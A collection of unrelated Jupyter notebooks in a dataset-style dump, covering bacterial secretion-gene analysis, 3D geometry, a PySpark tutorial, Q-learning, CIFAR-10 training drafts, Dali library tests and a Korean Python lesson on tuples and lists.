"pao1_pathways = annotations.load_format_KEGG(pao1_pathway_filename)\nprint(pao1_pathways.shape)\npao1_pathways.head()",
"(169, 2)\n"
]
],
[
[
"## Get genes related to secretion pathways",
"_____no_output_____"
]
],
[
[
"pao1_pathways.loc[\n [\n \"KEGG-Module-M00334: Type VI secretion system\",\n \"KEGG-Module-M00332: Type III secretion system\",\n \"KEGG-Module-M00335: Sec (secretion) system\",\n ]\n]",
"_____no_output_____"
],
[
"# Get genes related to pathways\nT6SS_genes = list(pao1_pathways.loc[\"KEGG-Module-M00334: Type VI secretion system\", 2])\nT3SS_genes = list(pao1_pathways.loc[\"KEGG-Module-M00332: Type III secretion system\", 2])\nsecretion_genes = list(\n pao1_pathways.loc[\"KEGG-Module-M00335: Sec (secretion) system\", 2]\n)",
"_____no_output_____"
],
[
"# Pull out genes related to T3SS\nT6SS_similarity = pao1_similarity.reindex(T6SS_genes)\nT3SS_similarity = pao1_similarity.reindex(T3SS_genes)\nsec_similarity = pao1_similarity.reindex(secretion_genes)",
"_____no_output_____"
],
[
"T6SS_similarity.sort_values(by=\"Transcriptional similarity across strains\")",
"_____no_output_____"
],
[
"T3SS_similarity.sort_values(by=\"Transcriptional similarity across strains\")",
"_____no_output_____"
],
[
"# sec_similarity.sort_values(by=\"Transcriptional similarity across strains\")",
"_____no_output_____"
],
[
"# Save T3SS and T6SS df for easier lookup\nT3SS_similarity.to_csv(\"T3SS_core_similarity_associations_final_spell.tsv\", sep=\"\\t\")\nT6SS_similarity.to_csv(\"T6SS_core_similarity_associations_final_spell.tsv\", sep=\"\\t\")",
"_____no_output_____"
]
],
[
[
"## Plot",
"_____no_output_____"
]
],
[
[
"plt.figure(figsize=(10, 8))\nsns.violinplot(\n data=pao1_similarity,\n x=\"Transcriptional similarity across strains\",\n palette=\"Blues\",\n inner=None,\n)\nsns.swarmplot(\n data=T6SS_similarity,\n x=\"Transcriptional similarity across strains\",\n color=\"k\",\n label=\"T6SS genes\",\n alpha=0.8,\n)\n\nsns.swarmplot(\n data=T3SS_similarity,\n x=\"Transcriptional similarity across strains\",\n color=\"r\",\n label=\"T3SS genes\",\n alpha=0.8,\n)\n\n# sns.swarmplot(\n# data=sec_similarity,\n# x=\"Transcriptional similarity across strains\",\n# color=\"yellow\",\n# label=\"secretion system genes\",\n# alpha=0.8,\n# )\n\n# Add text labels for least stable genes amongst the T3SS/T6SS\nplt.text(\n x=T3SS_similarity.loc[\n T3SS_similarity[\"Name\"] == \"pscR\", \"Transcriptional similarity across strains\"\n ],\n y=0.02,\n s=\"$pscR$\",\n)\n\nplt.text(\n x=T6SS_similarity.loc[\n T6SS_similarity[\"Name\"] == \"vgrG6\", \"Transcriptional similarity across strains\"\n ],\n y=-0.02,\n s=\"$vgrG6$\",\n)\nplt.text(\n x=T6SS_similarity.loc[\n T6SS_similarity[\"Name\"] == \"vgrG3\", \"Transcriptional similarity across strains\"\n ],\n y=-0.02,\n s=\"$vgrG3$\",\n)\nplt.text(\n x=T6SS_similarity.loc[\n T6SS_similarity[\"Name\"] == \"vgrG4a\", \"Transcriptional similarity across strains\"\n ],\n y=-0.02,\n s=\"$vgrG4a$\",\n)\n\nplt.title(\"Stability of secretion system genes\", fontsize=14)\nplt.legend()",
"_____no_output_____"
]
],
[
[
"We hypothesized that most secretion machinery genes would be conserved but that secreted proteins (i.e. effector proteins) would be less conserved. In general, the effector proteins were not included in the KEGG annotations, which is probably why these secretion systems were found to be highly stable.\n\nT6SS genes are among the most stable with the vgrG6, vgrG3, vgrG4a among the least stable. T3SS among the most stable with pscR among the least stable\n\nNeed to read more about these genes and if it makes sense that they are at the bottom.",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown"
] | [
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
]
] |
cb2aeb5023795a4f3e586b8933a98149cf9476b8 | 40,646 | ipynb | Jupyter Notebook | Mathematics/Linear Algebra/Python Visualization Notebooks/scikit-spatial/plot_line_line_3d.ipynb | okara83/Becoming-a-Data-Scientist | f09a15f7f239b96b77a2f080c403b2f3e95c9650 | [
"MIT"
] | null | null | null | Mathematics/Linear Algebra/Python Visualization Notebooks/scikit-spatial/plot_line_line_3d.ipynb | okara83/Becoming-a-Data-Scientist | f09a15f7f239b96b77a2f080c403b2f3e95c9650 | [
"MIT"
] | null | null | null | Mathematics/Linear Algebra/Python Visualization Notebooks/scikit-spatial/plot_line_line_3d.ipynb | okara83/Becoming-a-Data-Scientist | f09a15f7f239b96b77a2f080c403b2f3e95c9650 | [
"MIT"
] | 2 | 2022-02-09T15:41:33.000Z | 2022-02-11T07:47:40.000Z | 353.443478 | 38,524 | 0.944693 | [
[
[
"\n# 3D Line-Line Intersection\n",
"_____no_output_____"
]
],
[
[
"%matplotlib inline",
"_____no_output_____"
],
[
"from skspatial.objects import Line\nfrom skspatial.plotting import plot_3d",
"_____no_output_____"
],
[
"line_a = Line(point=[0, 0, 0], direction=[1, 1, 1])\nline_b = Line(point=[1, 1, 0], direction=[-1, -1, 1])",
"_____no_output_____"
],
[
"point_intersection = line_a.intersect_line(line_b)",
"_____no_output_____"
],
[
"plot_3d(\n line_a.plotter(),\n line_b.plotter(),\n point_intersection.plotter(c='k', s=75),\n)",
"_____no_output_____"
]
]
] | [
"markdown",
"code"
] | [
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code"
]
] |
cb2aef9d89bc13debc135c3206a0f1d100d406e8 | 6,641 | ipynb | Jupyter Notebook | 05-A-Tour-of-Spark/02-Starting-Spark.ipynb | ymei9/Big-Data-Analytics-for-Business | fba226e86a47ff188562655ce23b7af79781948a | [
"MIT"
] | 12 | 2019-02-01T01:02:02.000Z | 2022-03-22T22:45:39.000Z | 05-A-Tour-of-Spark/02-Starting-Spark.ipynb | ymei9/Big-Data-Analytics-for-Business | fba226e86a47ff188562655ce23b7af79781948a | [
"MIT"
] | null | null | null | 05-A-Tour-of-Spark/02-Starting-Spark.ipynb | ymei9/Big-Data-Analytics-for-Business | fba226e86a47ff188562655ce23b7af79781948a | [
"MIT"
] | 16 | 2019-02-03T15:56:51.000Z | 2022-03-29T03:34:21.000Z | 6,641 | 6,641 | 0.709532 | [
[
[
"## Launching Spark\n\nSpark's Python console can be launched directly from the command line by `pyspark`. SparkSession can be found by calling `spark` object. The Spark SQL console can be launced by `spark-sql`. We will experiment with these in the upcoming sessions.\n\nIf we have `pyspark` and other required packages installed we can also launch a SparkSession from a Python notebook environment. In order to do this we need to import the package `pyspark`.\n\nDatabrick and Google Dataproc notebooks already have pyspark installed and we can simply access the SparkSession by calling `spark` object.",
"_____no_output_____"
],
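The cell above notes that a SparkSession can also be created from a plain Python environment once `pyspark` is installed. A minimal sketch is shown below; the `local[*]` master and the application name are illustrative assumptions, not values taken from the original notebook.

```python
from pyspark.sql import SparkSession

# Build (or reuse) a SparkSession; master and appName are illustrative choices.
spark = SparkSession.builder \
    .master("local[*]") \
    .appName("tour-of-spark") \
    .getOrCreate()

print(spark.version)  # quick check that the session is alive
```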
[
"## The SparkSession\n\nYou control your Spark Application through a driver process called the SparkSession. The SparkSession instance is the way Spark executes user-defined manipulations across the cluster. There is a one-to-one correspondence between a SparkSession and a Spark Application. In Scala and Python, the variable is available as `spark` when you start the console. Let’s go ahead and look at the SparkSession:",
"_____no_output_____"
]
],
[
[
"spark",
"_____no_output_____"
]
],
[
[
"<img src=\"https://github.com/soltaniehha/Big-Data-Analytics-for-Business/blob/master/figs/04-02-SparkSession-JVM.png?raw=true\" width=\"700\" align=\"center\"/>",
"_____no_output_____"
],
[
"## Transformations\n\nLet’s now perform the simple task of creating a range of numbers. This range of numbers is just like a named column in a spreadsheet:",
"_____no_output_____"
]
],
[
[
"myRange = spark.range(1000).toDF(\"number\")",
"_____no_output_____"
]
],
[
[
"We created a DataFrame with one column containing 1,000 rows with values from 0 to 999. This range of numbers represents a distributed collection. When run on a cluster, each part of this range of numbers exists on a different executor. This is a Spark DataFrame.",
"_____no_output_____"
]
],
[
[
"myRange",
"_____no_output_____"
]
],
[
[
"Calling `myRange` will not return anything but the object behind it. It is because we haven't materialized the recipe for creating the DataFrame that we just created.\n\nCore data structures in Spark are immutable, meaning they cannot be changed after they’re created.\n\nTo “change” a DataFrame, you need to instruct Spark how you would like to modify it to do what you want. \n\nThese instructions are called **transformations**. Transformations are lazy operations, meaning that they won’t do any computation or return any output until they are asked to by an action.\n\nLet’s perform a simple transformation to find all even numbers in our current DataFrame:",
"_____no_output_____"
]
],
[
[
"divisBy2 = myRange.where(\"number % 2 = 0\")",
"_____no_output_____"
],
[
"divisBy2",
"_____no_output_____"
]
],
[
[
"The \"where\" statement specifies a narrow dependency, where only one partition contributes to at most one output partition. Transformations are the core of how you express your business logic using Spark. Spark will not act on transformations until we call an **action**.\n\n### Lazy Evaluation\n\nLazy evaulation means that Spark will wait until the very last moment to execute the graph of computation instructions. In Spark, instead of modifying the data immediately when you express some operation, you build up a plan of transformations that you would like to apply to your source data. By waiting until the last minute to execute the code, Spark compiles this plan from your raw DataFrame transformations to a streamlined physical plan that will run as efficiently as possible across the cluster. This provides immense benefits because Spark can optimize the entire data flow from end to end. An example of this is something called predicate pushdown on DataFrames. If we build a large Spark job but specify a filter at the end that only requires us to fetch one row from our source data, the most efficient way to execute this is to access the single record that we need. Spark will actually optimize this for us by pushing the filter down automatically.\n\n## Actions\n\nTransformations allow us to build up our logical transformation plan. To trigger the computation, we run an action. An action instructs Spark to compute a result from a series of transformations. The simplest action is count, which gives us the total number of records in the DataFrame:",
"_____no_output_____"
]
],
[
[
"divisBy2.count()",
"_____no_output_____"
]
],
[
[
"There are three kinds of actions:\n\n* Actions to view data in the console\n\n* Actions to collect data to native objects in the respective language\n\n* Actions to write to output data sources",
"_____no_output_____"
]
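As a hedged illustration of the three kinds of actions listed above (an editorial sketch, not part of the original notebook; the output path is made up), using the `divisBy2` DataFrame from this notebook:

```python
# 1) View data in the console
divisBy2.show(5)

# 2) Collect data to native Python objects
first_rows = divisBy2.take(3)   # a list of Row objects
total = divisBy2.count()        # a plain Python int

# 3) Write to an output data source (the path is illustrative)
divisBy2.write.mode("overwrite").parquet("/tmp/divis_by_2.parquet")
```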
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown"
] | [
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
]
] |
cb2af5f41b27ae8e598856f73aebc4c799445021 | 4,922 | ipynb | Jupyter Notebook | Reinforcement-Learning-Notebooks/Q-Learning.ipynb | PBenavides/Kaggle_competitions | 087703c69ced81d5c892352a9d7258159e29f3ce | [
"MIT"
] | 1 | 2021-03-11T20:02:22.000Z | 2021-03-11T20:02:22.000Z | Reinforcement-Learning-Notebooks/Q-Learning.ipynb | PBenavides/Kaggle_competitions | 087703c69ced81d5c892352a9d7258159e29f3ce | [
"MIT"
] | null | null | null | Reinforcement-Learning-Notebooks/Q-Learning.ipynb | PBenavides/Kaggle_competitions | 087703c69ced81d5c892352a9d7258159e29f3ce | [
"MIT"
] | 1 | 2021-07-13T23:51:30.000Z | 2021-07-13T23:51:30.000Z | 30.196319 | 592 | 0.499187 | [
[
[
"**Introducción:** \n\n\n\n**Environment:** \n\n\n\n\n**Matriz de Pagos:** Esta será la matriz de pagos. Solo habrán pagos (1) si es que podemos trasladarnos desde hacia ese estado.\n\n",
"_____no_output_____"
]
],
[
[
"import gym\n\nenv = gym.make('CartPole-v0')\nenv.reset()\n\nfor _ in range(1000):\n env.render()\n env.step(env.action_space.sample())\n\nenv.close()",
"_____no_output_____"
],
[
"import numpy as np",
"_____no_output_____"
],
[
"#Definimos los estados:\n\nlocacion_a_estado = {'L1' : 0,'L2' : 1,'L3' : 2,'L4' : 3,'L5' : 4,'L6' : 5,'L7' : 6,'L8' : 7,'L9' : 8}\n\nacciones = [0,1,2,3,4,5,6,7,8]\n\n#Recompensas\npagos = np.array([[0,1,0,0,0,0,0,0,0],\n [1,0,1,0,1,0,0,0,0],[0,1,0,0,0,1,0,0,0],[0,0,0,0,0,0,1,0,0],[0,1,0,0,0,0,0,1,0],\n [0,0,1,0,0,0,0,0,0],[0,0,0,1,0,0,0,1,0],[0,0,0,0,1,0,1,0,1],[0,0,0,0,0,0,0,1,0]])\n\n#https://blog.floydhub.com/an-introduction-to-q-learning-reinforcement-learning/\n#https://ai.googleblog.com/2018/10/curiosity-and-procrastination-in.html\n\nestado_a_locacion = dict((state,location) for location,state in locacion_a_estado.items())\n\n#Tendremos dos parámetros que daremos como externos: el factor de descuento y el learning_rate.\n\nfactor_descuento = 0.75\nlearning_rate = 0.9",
"_____no_output_____"
]
],
[
[
"Nuestro Q serán 9 vectores de 9 valores cada uno, pues son en sí cómo las decisiones que tomará el agente",
"_____no_output_____"
]
],
[
[
"Q = np.array(np.zeros([9,9])) #Inicializamos Q\n\n#Hacemos una copia de la matriz de pagos.\ncopia_pagos = np.copy(pagos)\n\n#Obtenemos el Estado final corresponiendo \nlocacion_final = '999'\n\nestado_final = locacion_a_estado[locacion_final]",
"_____no_output_____"
],
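A minimal sketch of the tabular Q-learning update this setup appears to be building towards. The loop below is an editorial assumption (it is not part of the original notebook); it reuses the `pagos`, `Q`, `factor_descuento` and `learning_rate` objects defined above and treats "move to state a" as the action:

```python
import numpy as np

rng = np.random.default_rng(0)

for _ in range(1000):
    estado = rng.integers(0, 9)                    # pick a random current state
    posibles = np.flatnonzero(pagos[estado] > 0)   # states reachable from here
    if posibles.size == 0:
        continue
    accion = int(rng.choice(posibles))             # next state == chosen action
    # Temporal-difference update: Q(s,a) += lr * (r + gamma * max_a' Q(s',a') - Q(s,a))
    td = pagos[estado, accion] + factor_descuento * Q[accion].max() - Q[estado, accion]
    Q[estado, accion] += learning_rate * td
```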
[
"Q",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
]
] |
cb2b10372eacca15355e224c2bc390cb977a3577 | 9,478 | ipynb | Jupyter Notebook | chap7/.ipynb_checkpoints/chap7_v3_gpu-checkpoint.ipynb | dustasa/senior_software_HW | 767d1d7bbd5e7d7414c17fa14b92b942e53d84ed | [
"Apache-2.0"
] | null | null | null | chap7/.ipynb_checkpoints/chap7_v3_gpu-checkpoint.ipynb | dustasa/senior_software_HW | 767d1d7bbd5e7d7414c17fa14b92b942e53d84ed | [
"Apache-2.0"
] | null | null | null | chap7/.ipynb_checkpoints/chap7_v3_gpu-checkpoint.ipynb | dustasa/senior_software_HW | 767d1d7bbd5e7d7414c17fa14b92b942e53d84ed | [
"Apache-2.0"
] | null | null | null | 31.698997 | 125 | 0.471302 | [
[
[
"import torch\nimport math\nimport torch.nn as nn\nimport torch.optim as optim\nimport torch.utils\nimport PIL\nfrom matplotlib import pyplot as plt\nfrom PIL import Image\nfrom torchvision import transforms\nfrom torchvision import datasets\n\n#Downloading CIFAR-10\ndata_path = '../data-unversioned/p1ch7/'\ncifar10 = datasets.CIFAR10(data_path, train=True, download=True)\ncifar10_val = datasets.CIFAR10(data_path, train=False, download=True) #下载太慢请开代理",
"_____no_output_____"
],
[
"# 引入normalize的数据初始化\ntensor_cifar10_normalize_train = datasets.CIFAR10(data_path, train=True, download=False,\n transform = transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((0.4915, 0.4823, 0.4468),\n (0.2470, 0.2435, 0.2616))\n ]))\n\ntensor_cifar10_normalize_val = datasets.CIFAR10(data_path, train=True, download=False,\n transform = transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((0.4915, 0.4823, 0.4468),\n (0.2470, 0.2435, 0.2616))\n ]))",
"_____no_output_____"
],
[
"# Build the dataset and DataLoader\n\nlabel_map = {0: 0, 2: 1} # 占位符\nclass_names = ['airplane', 'bird']\n# 训练集\ncifar2 = [(img, label_map[label])\n for img, label in tensor_cifar10_normalize_train\n if label in [0, 2]]\n# 验证集\ncifar2_val = [(img, label_map[label])\n for img, label in tensor_cifar10_normalize_val\n if label in [0, 2]]\n\ntrain_loader = torch.utils.data.DataLoader(cifar2, batch_size=64, shuffle=True)",
"_____no_output_____"
],
[
"class Animator: #@save\n \"\"\"在动画中绘制数据。\"\"\"\n def __init__(self, xlabel=None, ylabel=None, legend=None, xlim=None,\n ylim=None, xscale='linear', yscale='linear',\n fmts=('-', 'm--', 'g-.', 'r:'), nrows=1, ncols=1,\n figsize=(3.5, 2.5)):\n # 增量地绘制多条线\n if legend is None:\n legend = []\n d2l.use_svg_display()\n self.fig, self.axes = d2l.plt.subplots(nrows, ncols, figsize=figsize)\n if nrows * ncols == 1:\n self.axes = [self.axes, ]\n # 使用lambda函数捕获参数\n self.config_axes = lambda: d2l.set_axes(\n self.axes[0], xlabel, ylabel, xlim, ylim, xscale, yscale, legend)\n self.X, self.Y, self.fmts = None, None, fmts\n\n def add(self, x, y):\n # 向图表中添加多个数据点\n if not hasattr(y, \"__len__\"):\n y = [y]\n n = len(y)\n if not hasattr(x, \"__len__\"):\n x = [x] * n\n if not self.X:\n self.X = [[] for _ in range(n)]\n if not self.Y:\n self.Y = [[] for _ in range(n)]\n for i, (a, b) in enumerate(zip(x, y)):\n if a is not None and b is not None:\n self.X[i].append(a)\n self.Y[i].append(b)\n self.axes[0].cla()\n for x, y, fmt in zip(self.X, self.Y, self.fmts):\n self.axes[0].plot(x, y, fmt)\n self.config_axes()\n display.display(self.fig)\n display.clear_output(wait=True)",
"_____no_output_____"
],
[
"device = torch.device('cuda:0')\n\nmodel_F3 = nn.Sequential(\n nn.Linear(3072, 512),\n nn.Tanh(),\n nn.Linear(512, 2),\n nn.LogSoftmax(dim=1))\n\nmodel_F3.to(device)\nlr = 1e-2\noptimizer = optim.SGD(model_F3.parameters(),lr =lr)\nloss_fn = nn.NLLLoss()\nn_epochs = 100\n\n\nfor epoch in range(n_epochs):\n for imgs, labels in train_loader:\n imgs, labels = imgs.to(device), labels.to(device)\n \n batch_size = imgs.shape[0]\n outputs = model_F3(imgs.view(batch_size, -1))\n loss = loss_fn(outputs, labels)\n \n #out = model_F3(img.view(-1).unsqueeze(0)).to(device)\n #loss = loss_fn(out,torch.tensor([label]))\n \n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n \n print(\"Epoch: %d, Loss: %f\" % (epoch, float(loss)))",
"_____no_output_____"
],
[
"class model_chap7(nn.Module):\n \n def __init__(self, config):\n super(model_chap7, self).__init__()\n #self._num_users = config['num_users']\n #self._num_items = config['num_items']\n #self._hidden_units = config['hidden_units']\n #self._lambda_value = config['lambda']\n self._config = config\n\n def forward(self,torch_input):\n\n encoder = self.encoder(torch_input)\n decoder = self.decoder(encoder)\n return decoder\n\n def loss(self,decoder,input,optimizer,mask_input):\n \n loss_fn = nn.NLLLoss()\n \n return cost,rmse",
"_____no_output_____"
],
[
"class NetWidth(nn.Module):\n \n def __init__(self):\n super().__init__()\n self.conv1 = nn.Conv2d(3, 32, kernel_size=3, padding=1)\n self.conv2 = nn.Conv2d(32, 16, kernel_size=3, padding=1)\n self.fc1 = nn.Linear(16 * 8 * 8, 32)\n self.fc2 = nn.Linear(32, 2)\n \n def forward(self, x):\n out = F.max_pool2d(torch.tanh(self.conv1(x)), 2)\n out = F.max_pool2d(torch.tanh(self.conv2(out)), 2)\n out = out.view(-1, 16 * 8 * 8)\n out = torch.tanh(self.fc1(out))\n out = self.fc2(out)\n \n return out",
"_____no_output_____"
],
[
"autorec_config = \\\n{\n 'train_ratio': 0.9,\n 'num_epoch': 100,\n 'batch_size': 100,\n 'optimizer': 'SGD',\n 'adam_lr': 1e-2,\n 'lambda': 1,\n 'device_id': 2,\n 'use_cuda': True,\n 'model_name': 'model_chap7'\n}",
"_____no_output_____"
],
[
"# 实例化AutoRec对象\nmodel = model_chap7(autorec_config)",
"_____no_output_____"
],
[
"'''Train'''\ndef train(epoch):\n loss = 0\n \n for step, (batch_x, batch_y) in enumerate(train_loader):\n\n batch_x = batch_x.type(torch.FloatTensor)\n\n decoder = rec(batch_x) # 第一步,数据的前向传播,计算预测值\n loss, rmse = rec.loss(decoder=decoder, input=batch_x, optimizer=optimer, mask_input=batch_mask_x) # 第二步,计算误差\n optimer.zero_grad() # 反向传播前,梯度归零\n loss.backward() # 第三步,反向传播\n optimer.step() # 一步更新所有参数\n cost_all += loss\n RMSE += rmse\n\n RMSE = np.sqrt(RMSE.detach().cpu().numpy() / (train_mask_r == 1).sum())\n animator.add(epoch + 1, RMSE)",
"_____no_output_____"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb2b12b3a64e497d27ac424bb8723fc3e13078a6 | 25,713 | ipynb | Jupyter Notebook | Pioneer.ipynb | JonathanRaiman/dali-cython-stub | e258469aeb1d4cb3e4cdf5c07e8948f461a038f1 | [
"MIT"
] | 7 | 2016-06-20T17:50:06.000Z | 2019-12-13T17:27:46.000Z | Pioneer.ipynb | JonathanRaiman/dali-cython | e258469aeb1d4cb3e4cdf5c07e8948f461a038f1 | [
"MIT"
] | 6 | 2015-08-04T07:25:38.000Z | 2015-08-13T22:06:22.000Z | Pioneer.ipynb | JonathanRaiman/dali-cython | e258469aeb1d4cb3e4cdf5c07e8948f461a038f1 | [
"MIT"
] | 2 | 2016-07-04T21:38:14.000Z | 2016-08-31T02:53:19.000Z | 26.700935 | 2,159 | 0.51577 | [
[
[
"from dali.core import MatOps, Mat, SGD, AdaGrad, RMSProp, AdaDelta, Adam, GRU, Graph, NoBackprop, config\nimport numpy as np",
"_____no_output_____"
],
[
"config.default_device = 'cpu'",
"_____no_output_____"
],
[
"# this works\nx = Mat(2, 3)\nh = Mat(2, 3)\nprint((x+h).dims())",
"(2, 3)\n"
],
[
"x = Mat(np.arange(6).reshape(2,3))",
"_____no_output_____"
],
[
"x.sum(axis=0)",
"_____no_output_____"
],
[
"MatOps.softmax(x, axis=0)",
"_____no_output_____"
],
[
"MatOps.softmax_cross_entropy(x, Mat([0,0,0], dtype=np.int32), axis=0)",
"_____no_output_____"
],
[
"params = [Mat(np.random.randn(3,3))]\nsgd = SGD(params)",
"_____no_output_____"
],
[
"gru.memory_to_memory_layer.",
"_____no_output_____"
],
[
"sgd",
"_____no_output_____"
],
[
"params[0].dw",
"_____no_output_____"
],
[
"params[0].w",
"_____no_output_____"
],
[
"#sgd.create_gradient_caches(params)",
"_____no_output_____"
],
[
"gru = GRU(10, 10)",
"_____no_output_____"
],
[
"gru.initial_states().shape",
"_____no_output_____"
],
[
"params[0].dw += 1\nsgd.step(params)",
"_____no_output_____"
],
[
"sgd.step_size = 0.5",
"_____no_output_____"
],
[
"params",
"_____no_output_____"
],
[
"MatOps.hstack(\n [\n Mat(3,3)\n ]\n)",
"_____no_output_____"
],
[
"x.name = \"bob\"",
"_____no_output_____"
],
[
"x.name",
"_____no_output_____"
],
[
"# this throws an exception\nx = test_dali.Mat(2, 3)\nh = test_dali.Mat(3, 3)\n#print( test_dali.Mat.add_mofos(x,h).dims() )\nprint((x / h).dims())",
"_____no_output_____"
],
[
"# this succeeds\nx = test_dali.Mat(2, 3)\nh = test_dali.Mat(3, 3)\nlayer = test_dali.RNN(2, 3, 3)\no = layer.activate(x, h)\nprint(o.dims())",
"(3, 3)\n"
],
[
"# this throws an exception\nx = test_dali.Mat(2, 3)\nh = test_dali.Mat(2, 3)\nlayer = test_dali.RNN(2, 3, 3)\no = layer.activate(x, h)\nprint(o.dims())",
"_____no_output_____"
],
[
"layer.hidden_size",
"_____no_output_____"
],
[
"x.__add__(h)",
"_____no_output_____"
],
[
"(x + h).dims()",
"_____no_output_____"
],
[
"x * h",
"_____no_output_____"
],
[
"vocab = test_dali.Vocab([\"a\", \"b\", \"c\"], True)",
"_____no_output_____"
],
[
"layer = test_dali.Layer(5, 3)",
"_____no_output_____"
],
[
"params = layer.parameters()",
"_____no_output_____"
],
[
"param = params[0]",
"_____no_output_____"
],
[
"layer.parameters()",
"_____no_output_____"
],
[
"slayer = test_dali.StackedInputLayer([5, 5, 5], 7)",
"_____no_output_____"
],
[
"slayer_knife = test_dali.Mat(5, 1)",
"_____no_output_____"
],
[
"slayer.activate([slayer_knife, slayer_knife, slayer_knife])",
"_____no_output_____"
],
[
"slayer.parameters()",
"_____no_output_____"
],
[
"slayer2.parameters()",
"_____no_output_____"
],
[
"test_dali.Graph.emplace_back(backprop)",
"_____no_output_____"
],
[
"test_dali.Graph.backward()",
"_____no_output_____"
],
[
"from test_dali import Graph,LSTM, GRU, StackedInputLayer, Layer, Mat, LSTMState, StackedLSTM, random as drandom, MatOps",
"_____no_output_____"
],
[
"import pickle",
"_____no_output_____"
],
[
"slstm = StackedLSTM([5,5], [3,3,3])",
"_____no_output_____"
],
[
"slstm.parameters()[0].w",
"_____no_output_____"
],
[
"slstm2 = pickle.loads(pickle.dumps(slstm))\nslstm2.parameters()[0]",
"_____no_output_____"
],
[
"mat = drandom.uniform(-4, 4, (100,100))",
"_____no_output_____"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb2b42aa322172fc82934bcfdbdf9cbd39db4965 | 583,151 | ipynb | Jupyter Notebook | Notebooks/SQLDBverify.ipynb | mggeorgiev/db-maintenance | 2357c36d4549055a9a9f56654abb830f9ce9078a | [
"MIT"
] | null | null | null | Notebooks/SQLDBverify.ipynb | mggeorgiev/db-maintenance | 2357c36d4549055a9a9f56654abb830f9ce9078a | [
"MIT"
] | null | null | null | Notebooks/SQLDBverify.ipynb | mggeorgiev/db-maintenance | 2357c36d4549055a9a9f56654abb830f9ce9078a | [
"MIT"
] | null | null | null | 54.41872 | 2,575 | 0.262899 | [
[
[
"empty"
]
]
] | [
"empty"
] | [
[
"empty"
]
] |
cb2b457cc82e5aae3747bc9d66a6381da7ff90c8 | 53,428 | ipynb | Jupyter Notebook | Python-101-Part2.ipynb | danielykim/python-guide | cf9c2f83197d86d7776ac72c1a287da0933254a7 | [
"MIT"
] | 2 | 2019-05-22T01:41:53.000Z | 2019-06-23T07:34:07.000Z | Python-101-Part2.ipynb | danielykim/python-guide | cf9c2f83197d86d7776ac72c1a287da0933254a7 | [
"MIT"
] | null | null | null | Python-101-Part2.ipynb | danielykim/python-guide | cf9c2f83197d86d7776ac72c1a287da0933254a7 | [
"MIT"
] | null | null | null | 18.203748 | 81 | 0.471644 | [
[
[
"2018-10-26\n\n실용주의 파이썬 101 - Part 2\n\n[김영호](https://www.linkedin.com/in/danielyounghokim/)",
"_____no_output_____"
],
[
"난이도 ● ● ◐ ○ ○",
"_____no_output_____"
],
[
"# Data Structures\n- Immutable vs. Mutable\n - Immutable: `tuple`\n - Mutable: `list`, `set`, `dict`",
"_____no_output_____"
],
[
"- Mutable Container 설명 순서\n - 초기화\n - 추가/삭제\n - 특정 값 접근(access)\n - 정렬",
"_____no_output_____"
],
[
"## `tuple`",
"_____no_output_____"
],
[
"### 초기화",
"_____no_output_____"
]
],
[
[
"seq = ()",
"_____no_output_____"
],
[
"type(seq)",
"_____no_output_____"
],
[
"seq = (1, 2, 3)",
"_____no_output_____"
],
[
"seq",
"_____no_output_____"
]
],
[
[
"### 크기 확인",
"_____no_output_____"
]
],
[
[
"len(seq)",
"_____no_output_____"
]
],
[
[
"화면에 `(`와 `)`로 묶여 구분자 `,`와 함께 표시됩니다.",
"_____no_output_____"
]
],
[
[
"type(seq)",
"_____no_output_____"
]
],
[
[
"변수형이 달라도 됩니다.",
"_____no_output_____"
]
],
[
[
"('월', 10, '일', 26)",
"_____no_output_____"
]
],
[
[
"### 접근",
"_____no_output_____"
]
],
[
[
"seq[0]",
"_____no_output_____"
]
],
[
[
"### Immutability\n`tuple`로 정의한 것은 바꾸지 못합니다(immutable).",
"_____no_output_____"
]
],
[
[
"seq[0] = 4",
"_____no_output_____"
]
],
[
[
"### 분배",
"_____no_output_____"
]
],
[
[
"fruits_tuple = ('orange', 'apple', 'banana')",
"_____no_output_____"
],
[
"fruit1, fruit2, fruit3 = fruits_tuple",
"_____no_output_____"
],
[
"print(fruit1)\nprint(fruit2)\nprint(fruit3)",
"_____no_output_____"
]
],
[
[
"## `list`\n- 정말 많이 쓰기 때문에 굉장히 중요한 자료 구조",
"_____no_output_____"
],
[
"### 초기화",
"_____no_output_____"
]
],
[
[
"temp_list = []",
"_____no_output_____"
],
[
"type(temp_list)",
"_____no_output_____"
],
[
"temp_list = [1, 'a', 3.4]",
"_____no_output_____"
],
[
"temp_list",
"_____no_output_____"
]
],
[
[
"#### `list` of `tuple`s",
"_____no_output_____"
]
],
[
[
"temp_list = [\n ('김 책임', '남'),\n ('박 선임', '여'),\n ('이 수석', '남', 15),\n ('최 책임', '여')\n]",
"_____no_output_____"
]
],
[
[
"`tuple` 길이가 달라도 됩니다.",
"_____no_output_____"
],
[
"#### `list` of `list`s",
"_____no_output_____"
]
],
[
[
